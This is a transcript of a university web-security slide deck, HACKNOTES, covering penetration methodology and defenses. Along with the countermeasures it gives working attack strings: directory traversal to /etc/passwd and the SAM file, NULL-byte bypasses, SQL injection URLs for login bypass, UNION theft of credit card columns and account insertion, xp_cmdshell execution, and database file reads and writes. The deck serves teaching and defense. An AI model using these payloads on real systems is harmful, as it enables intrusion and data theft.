HACKNOTES Web Security - PowerPoint PPT Presentation

Description: Information Networking Security and Assurance Lab. National Chung Cheng ...

Transcript and Presenter's Notes

1
HACKNOTES - Web Security
2
Hacking Techniques & Defenses
  • Web Hacking Penetration Methodologies
  • Critical Hacks & Defenses

3
Web Hacking Penetration Methodologies
  • Threats and Vulnerabilities
  • Profiling the Platform
  • Profiling the Application
  • Summary

4
THREATS AND VULNERABILITIES
  • Vulnerabilities
  • The platform: Linux, Windows, Apache, Oracle
  • The application: programming errors
  • SQL injection
  • Session hijacking

5
PROFILING THE PLATFORM
  • Web Server: Apache, IIS, Netscape
  • Application Server: Tomcat Servlet, PHP, ASP.NET
  • Database: Oracle, MSSQL, DB2, Informix, Sybase.

6
Port Scanning and Service Identification
  • Nmap

7
Port Scanning and Service Identification
  • Scanline: fast, but only performs SYN, ICMP and
    UDP scans

8
Port Scanning and Service Identification
  • Netcat & openssl

openssl s_client -connect website:443 -cipher EXPORT40
openssl s_client -connect website:443 -cipher NULL
openssl s_client -connect website:443 -cipher HIGH
9
Vulnerability scanning
  • Nikto & Nessus

10
Platform profile checklist
  • Identify the server's role
  • Determine the operating system and version
  • Determine the operating system and application
    patch level
  • Scan for open ports
  • Record the web server type, patch level, and
    additional components
  • Research known vulnerabilities.

11
PROFILING THE APPLICATION
  • The next step is to profile the actual web site
    by systematically cataloging all of its pages,
    functions, and parameters.
  • To identify common problems such as poor input
    validation, inadequate session handling, and
    other programming errors.

12
Enumerate the Directory Structure and Files
  • Indexes: the easy part is going through the
    application and recording each file name and its
    full path from the web root.
  • Teleport, wget
  • libwhisker's crawl function

13
Identify Authentication Mechanism
Keep in mind that challenge/response
mechanisms don't protect passwords with 100
percent security.
14
Identify Authorization Mechanism
  • Identify Authorization Tokens
  • http://website/index.php?id=allen&isadmin=false&menu=basic
    If the request succeeds, then the application is
    vulnerable to horizontal privilege escalation.
  • http://website/index.php?id=george&isadmin=false&menu=basic
    If the request doesn't receive administrator
    rights, then user impersonation still works,
    but the server tracks authorization in a
    parameter other than id. Otherwise, the
    application performs the authorization check
    based on the username and is vulnerable to
    horizontal and vertical privilege escalation.
  • http://website/index.php?id=matt&isadmin=true&menu=full
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    attack required manipulating multiple tokens,
    but the application still failed to enforce
    strong authorization checks.
  • http://website/index.php?id=matt&isadmin=false&menu=full
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    application doesn't perform any authorization
    checks after the user has authenticated.
  • http://website/index.php?id=matt&isadmin=true&menu=basic
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    application performs an authorization check on
    the isadmin parameter and provides functionality
    according to its value.

15
Protect Authorization
  • The best defense is to track as many user
    attributes on the server as possible.
  • Creating role-based access in a custom database
    table increases application overhead and
    maintenance; however, the security requirements
    of the application may require such a technique.
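As an added illustration (not code from the slides or from the HackNotes book), here is the defense on this slide in Python: the vulnerable handler decides authorization from the id, isadmin and menu tokens the client sends, while the hardened handler takes identity and role only from server-side session state. SESSIONS, ROLES and the handle_* functions are hypothetical names.

```python
from urllib.parse import parse_qs

# Constructed server-side state: session cookie -> user, user -> role.
SESSIONS = {"sess-allen": "allen", "sess-matt": "matt"}
ROLES = {"allen": "user", "matt": "admin"}


def parse_request(query: str, cookie: str) -> dict:
    """Split a query string such as 'id=allen&isadmin=false&menu=basic'."""
    params = {k: v[0] for k, v in parse_qs(query).items()}
    params["cookie"] = cookie
    return params


def handle_vulnerable(query: str, cookie: str) -> str:
    """Authorization decided by tokens the user controls (the slide 14 failure)."""
    p = parse_request(query, cookie)
    if p.get("isadmin") == "true" or p.get("menu") == "full":
        return "admin-menu for " + p.get("id", "?")
    return "basic-menu for " + p.get("id", "?")


def handle_hardened(query: str, cookie: str) -> str:
    """Authorization decided only from server-side session state (slide 15)."""
    p = parse_request(query, cookie)
    user = SESSIONS.get(cookie)
    if user is None:
        return "login-required"
    # isadmin and menu from the URL are ignored entirely; an id that does
    # not match the session's user is an impersonation attempt: deny (and log).
    if p.get("id") not in (None, user):
        return "forbidden"
    if ROLES.get(user) == "admin":
        return "admin-menu for " + user
    return "basic-menu for " + user
```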

16
Identify All Support Files
  • style sheets (.css)
  • IIS files that are interpreted by specific ISAPI
    (internet server application programming
    interface) filters, such as .htr, .htx, .idc ,
    .ida and .idq.
  • passwd.txt, global.asa
  • Nikto will identify these common files, but only
    in default locations.

17
Identify All Include Files
  • To identify an include file, search for the
    Server Side Include (SSI) tag.
  • Virtual
  • File
  • PHP
  • Log

<!--#include virtual="/html/include/header.inc" -->
<!--#include file="include/header.inc" -->
18
Protect Include Files
  • Always use the language's file suffix instead of
    .inc when naming include files.
  • If you're using Apache::ASP, then you can either
    rename the files to .asp or modify the httpd.conf
    file
  • The <FilesMatch> trick

<% This line will not be visible if the file suffix is .asp %>
<!-- This line will be visible regardless of the file suffix -->
19
Enumerate All Forms
  • The indicator of a form is the HTML <form> tag;
    however, the salient portions are the input
    type definitions
  • Form-based authentication is also a primary
    target for brute-force password-guessing attacks.

From APBoard:
<INPUT TYPE="hidden" NAME="sess_id" VALUE="">
<INPUT TYPE="hidden" NAME="postit" VALUE="TRUE">
<INPUT TYPE="hidden" NAME="insertinto" VALUE="1">
<INPUT TYPE="hidden" NAME="BoardID" VALUE="1">
<INPUT CLASS="button" TYPE="submit" NAME="new_topic" VALUE="Thema posten">
<INPUT CLASS="button" TYPE="submit" NAME="preview_topic" VALUE="Vorschau">
20
Enumerate All GET Parameters
  • Many applications track variables through URL
    parameters. The server sets these parameters
    based on user permission level, a user's action,
    a session ID, or a similar function.
  • Changing a parameter's value can point to the
    parameter's function or its relation to session
    tracking, or it can generate informational errors.
  • Each GET parameter should also be tested for
    input validation and SQL injection attacks.

http://website/main.asp?menu=viewprofile
Values to try for menu: viewprofile, user, welcome, admin, debug
21
Protect Parameters
  • If the application uses GET parameters to track
    values, then you might consider using POST requests
    more often.
  • The parameters to a POST request will not show up
    in a browser's history file or bookmarks.

22
Identify Vectors for Directory Attacks
  • Directory attacks: traversal and listing
  • Applications that use templating techniques
  • Typical attack: the NULL (%00) character
  • Try this to bypass scripts that check for file
    extensions or automatically append characters to
    file names.
  • http://website/cgi-bin/bb-hostsvc.sh?HOSTSVC=www,website,com.cpu
  • http://website/servlet/webacc?User.html=index
  • http://website/ultraboard.pl?action=PrintableTopic&Post=42
  • ../../../../etc/passwd
  • ../../conf/httpd.conf
  • ../../../../boot.ini
  • ../../../../winnt/repair/sam

../../etc/passwd%00.html
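An added example (not from the slides) of the server-side check that closes both vectors on this slide: a template loader that rejects NUL bytes before appending its suffix, canonicalises the path, and only then verifies that the result is still under the web root and still carries the expected suffix. WEBROOT, TEMPLATE_EXT and resolve_template are hypothetical names.

```python
import posixpath

WEBROOT = "/var/www/templates"     # hypothetical document root
TEMPLATE_EXT = ".html"


def resolve_template(user_path: str):
    """Map a user-supplied template name to a file under WEBROOT.

    Returns the absolute path to serve, or None when the request must be
    refused. Order matters: reject NUL first, then append the suffix,
    then canonicalise, then check prefix and suffix on the result.
    """
    # 1. A NUL byte truncates the name in C-based libraries, so
    #    "passwd%00.html" would pass a suffix check yet open "passwd".
    if "\x00" in user_path:
        return None
    # 2. Append the suffix the way the scripts on the slide do ...
    candidate = posixpath.normpath(
        posixpath.join(WEBROOT, user_path + TEMPLATE_EXT))
    # 3. ... then confirm the normalised path is still inside the web root.
    #    normpath collapses "../" components; on a real filesystem use
    #    realpath as well so symlinks cannot lead outside the root.
    if posixpath.commonpath([WEBROOT, candidate]) != WEBROOT:
        return None
    # 4. Re-check the suffix on the canonical name, not on the raw input.
    if not candidate.endswith(TEMPLATE_EXT):
        return None
    return candidate
```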
23
Identify Areas that Provide File Upload Capability
  • File upload introduces several threats to the
    application
  • Malicious Content
  • File Overwrite
  • Denial of Service

24
Identify Errors
  • Two steps
  • Simply try to generate some errors in the
    application.
  • Identify what types of errors are generated on
    the server and how they are displayed to the user.

Inserting garbage characters, deleting
parameters, inserting punctuation
  • Did it return the server's default HTTP 500
    message?
  • Is it a customized error page?
  • Does an error return a custom page, but an HTTP
    200 message?
  • What information does the error contain?
  • Can you identify path information?
  • What about internal variables or references to
    other files?
  • Is the error related to SQL queries?
25
Protect Error Messages
  • Errors can be caught in two locations:
  • The web or application server
    Change the content of these pages so that it does
    not include any server or application
    information.
  • The application itself
    Make sure that the application has proper
    error-handling routines that default to a simple,
    innocuous error message.

26
Determine Which Pages Require SSL
  • Replace all of the https:// references with
    http:// and see if the application still serves
    the page.
  • The server and application should be designed to
    ensure that sensitive files are transmitted via
    SSL.

27
Application Profile Checklist
28
SUMMARY
  • In order to fully vet the security of an
    application, it must first be fully profiled.
  • This basically involves gathering as much
    information as possible about the platform and
    the application.
  • A good profile of the application and knowledge
    of SQL can turn an innocuous error into a severe
    exploit.

29
2 Critical Hacks & Defenses
  • Generic Input Validation
  • Character Encoding
  • Alternate Request Methods
  • SQL Injection
  • Cross-site Scripting
  • Token Analysis
  • Session Attacks
  • XML-Based Services
  • Fundamental Application Defenses
  • Input Validation
  • Summary

30
GENERIC INPUT VALIDATION
  • Common input validation tests

31
GENERIC INPUT VALIDATION
  • Common input validation tests (cont.)

32
Common Vectors
Consider these vectors as well.
Example input validation attack vectors
33
Source Disclosure
  • Certain input validation attacks manipulate the
    CGI's file name in order to cause its source to
    be displayed in a user's browser.
  • Java-based server engines seem to be most
    vulnerable to this type of validation attack
  • /foo.jsP
  • /foo.js%70
  • /%3f.jsp (directory listing)
  • /foo.asp::$DATA
  • /foo.asp.html

34
CHARACTER ENCODING
  • URL Encoding (Escaped Characters)
  • Unicode

Mask     1 1 0 0 0 0 b7 b6   1 0 b5 b4 b3 b2 b1 b0
         ---- first byte ----   ---- second byte ----
Example  0 0 1 0 1 1 1 1 (2F)
         b7 b6 b5 b4 b3 b2 b1 b0
         ------ one byte ------
Result   1 1 0 0 0 0 0 0 (C0)   1 0 1 0 1 1 1 1 (AF)   In URL: %c0%af
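An added Python example (not from the slides) that shows why the table above matters to a filter: a decoder that applies only the bit mask accepts C0 AF as '/', whereas a strict UTF-8 decoder rejects the overlong form, so a server-side check that decodes once and strictly, before comparing the path, never sees the hidden slash. lenient_utf8, strict_utf8 and decode_path are hypothetical names.

```python
from urllib.parse import unquote_to_bytes


def lenient_utf8(data: bytes) -> str:
    """Decode by the slide's bit masks alone, with no overlong check.

    This is how a filter that never validates canonical form behaves:
    C0 AF passes the 110xxxxx / 10xxxxxx mask test and yields U+002F '/'.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                                   # one-byte form
            out.append(chr(b))
            i += 1
        elif (b & 0xE0 == 0xC0 and i + 1 < len(data)
              and data[i + 1] & 0xC0 == 0x80):         # two-byte form
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("unsupported sequence at offset %d" % i)
    return "".join(out)


def strict_utf8(data: bytes) -> str:
    """Python's decoder refuses overlong forms: C0 and C1 are never valid."""
    return data.decode("utf-8")


def decode_path(encoded: str):
    """Percent-decode once, then decode the bytes both ways.

    Returns (lenient_result, strict_result); strict_result is None when the
    strict decoder rejects the input, which is the outcome a server-side
    filter should act on (refuse the request) before any path comparison.
    """
    raw = unquote_to_bytes(encoded)
    lenient = lenient_utf8(raw)
    try:
        strict = strict_utf8(raw)
    except UnicodeDecodeError:
        strict = None
    return lenient, strict
```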
35
Some Useful Unicode-Encoded Characters
36
ALTERNATE REQUEST METHODS
  • SPIKE proxy
  • http://www.immunitysec.com/resources-freesoftware.shtml
  • GET, POST, BROWSE, CONNECT, COPY, DELETE, HEAD,
    LOCK, MKCOL, MOVE, OPTIONS, PROPFIND, PROPPATCH,
    PUT, SEARCH, TRACE, and UNLOCK.

37
SQL INJECTION
URL = HTTP.GetFromUser()
user_id = URL.parameter("user_id")
password = URL.parameter("password")
query = "SELECT name FROM userlist WHERE uid='" + user_id + "' AND pwd='" + password + "'"
database.connect()
result = database.execute(query)
if result
    HTTP.Send("Login successful. Welcome, " + result)
    IsAuthenticated = true
else
    HTTP.Send("User ID or password is incorrect.")
    IsAuthenticated = false
end if
if IsAuthenticated
    HTTP.Send(MainMenu)
end if

https://website/login.cgi?user_id=dcooper&password=diane
https://website/login.cgi?user_id=dcooper'%20--
38
SELECT Statement Manipulation
  • https://website/login.cgi?user_id=dcooper&password='%20OR%20'%3d'
  • https://website/login.cgi?user_id=dcooper&password=foo'%20OR%201%3d1
  • https://website/login.cgi?user_id='%20OR%20'%3d'&password='%20OR%20'%3d'
  • https://website/login.cgi?user_id=%25'--

SELECT name FROM userlist WHERE uid='dcooper' AND pwd='' OR '=''
SELECT name FROM userlist WHERE uid='dcooper' AND pwd='foo' OR 1=1
SELECT name FROM userlist WHERE uid='' OR '='' AND pwd='' OR '=''
SELECT name FROM userlist WHERE uid='%'-- AND pwd=''
39
Retrieve Arbitrary Data with SELECT plus UNION
  • SELECT value(s) FROM table WHERE clause_false
    UNION ALL SELECT value(s) FROM other_table WHERE
    clause_true

https://website/login.cgi?user_id=foo&password='UNION%20ALL%20SELECT%20uid,pwd%20FROM%20userlist%20WHERE%20'%3d'

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT uid, pwd FROM userlist WHERE '=''

https://website/login.cgi?user_id=foo&password=%27UNION%20ALL%20SELECT%20first%5fname%2clast%5fname%2cccard%20FROM%20store%20WHERE%20%27%27%3d%27%27

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT first_name,last_name,ccard FROM store WHERE ''=''

SELECT name FROM userlist WHERE uid='foo' AND pwd='bar' UNION ALL SELECT first_name, last_name, ccard FROM store WHERE 1=1
40
Use INSERT to Modify Data
  • INSERT INTO user (User,Password) VALUES
    ('albert','camus')

https://website/login.cgi?user_id=&password=%27;INSERT%20INTO%20userlist%20%28uid%2cpassword%29%20VALUES%20%28%27albert%27%2c%27camus%27%29--

SELECT name FROM userlist WHERE uid='' AND pwd=''; INSERT INTO userlist (uid,password) VALUES ('albert','camus')--'
41
Salient Information for Common Databases
42
Common SQL Injection String
43
SQL Injection Countermeasures
  • Use strongly typed variables and database column
    definitions.
  • Assign query results to a strongly typed
    variable.
  • Limit data lengths.
  • Avoid creating queries via string concatenation.
  • Apply data separation and role-based access
    within the database.

http://website/votw/analysis.asp?voteid=@@version

Microsoft OLE DB Provider for SQL Server error '80040e57'
Arithmetic overflow error converting nvarchar to data type numeric.
/vote/analysis.asp, line 19

SELECT something FROM table WHERE variable=@@version
44
Microsoft SQL Server
  • Insert a single quote (') into URL parameters and
    then examine the output, HTML source, or even the
    URL parameters for a tell-tale sign.
  • In addition to the slew of attacks that can be
    performed against any SQL-based database, MSSQL
    Server contains a set of very powerful and
    dangerous commands.

EXEC master..xp_cmdshell 'command'
https://website/vuln.cgi?param=';xp_cmdshell+'ipconfig/all'--
45
High-Risk Stored Procedures in MSSQL
46
Useful Objects and Variables
47
Oracle
Informational Oracle parameters:
show parameters control_files

CREATE DIRECTORY somedir AS '/path/to/dir';
CREATE TABLE foo (bar varchar2(20))
  ORGANIZATION EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY somedir LOCATION ('somefile.dat'));

DECLARE
  fh UTL_FILE.FILE_TYPE;
BEGIN
  fh := UTL_FILE.FOPEN('/some/dir', 'file.name', 'W');  -- write
  UTL_FILE.PUTF(fh, 'somedata');
  UTL_FILE.FCLOSE(fh);
END;
48
MySQL Read from the File System
mysql> CREATE TABLE foo (bar TEXT);
Query OK, 0 rows affected (0.02 sec)
mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE foo;
Query OK, 27 rows affected (0.02 sec)
Records: 27  Deleted: 0  Skipped: 0  Warnings: 0
mysql> SELECT * FROM foo;
bar
---------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
mike:x:500:500:mike:/home/mike:/bin/bash
mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash
postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash

https://website/vuln.cgi?param=%27;CREATE%20TABLE%20foo%20%28bar%20TEXT%29
https://website/vuln.cgi?param=%27;LOAD%20DATA%20INFILE%20%27%2fetc%2fpasswd%27%20INTO%20TABLE%20foo
https://website/vuln.cgi?param=%27;SELECT%20%2a%20FROM%20foo
49
MySQL Write to the File System
Create a DoS by taking up disk space
SELECT * FROM employees INTO OUTFILE '/tmp/foo'
https://website/vuln.cgi?param=%27;SELECT%20%2a%20FROM%20employees%20INTO%20OUTFILE%20%27%2ftmp/%2f..%08%27

melnibone$ ls -la /tmp
drwxrwxrwx  8 root  root  4096 jan 16 16:28 .
drwxrwxrwx 19 root  adm   4096 jan 16 14:03 ..
drwxrwxrwx  1 mysql mysql 1269 jan 16 16:28 ..
melnibone$ ls -la /tmp | cat -tve
drwxrwxrwx  8 root  root  4096 jan 16 16:28 ./$
drwxrwxrwx 19 root  adm   4096 jan 16 14:03 ../$
drwxrwxrwx  1 mysql mysql 1269 jan 16 16:28 ..^H$
50
PostgreSQL File Read/Write Access with COPY
test=# CREATE TABLE foo (bar TEXT);
CREATE
test=# COPY foo FROM '/etc/passwd';
COPY
test=# SELECT * FROM foo;
 bar
---------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 mike:x:500:500:mike:/home/mike:/bin/bash
 mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash
 postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash
(27 rows)
test=# COPY foo FROM '/var/lib/pgsql/data/pg_hba.conf';
COPY foo TO '/var/lib/pgsql/data/pg_hba.conf';
COPY foo TO '/tmp/table_data';
COPY pg_shadow TO '/tmp/foo';
51
MySQL & PostgreSQL: Protect the File System
  • Running the application in a low-privilege
    account limits the exposure of important system
    configuration files and binaries.
  • chroot or jail environments.
  • Protect system files.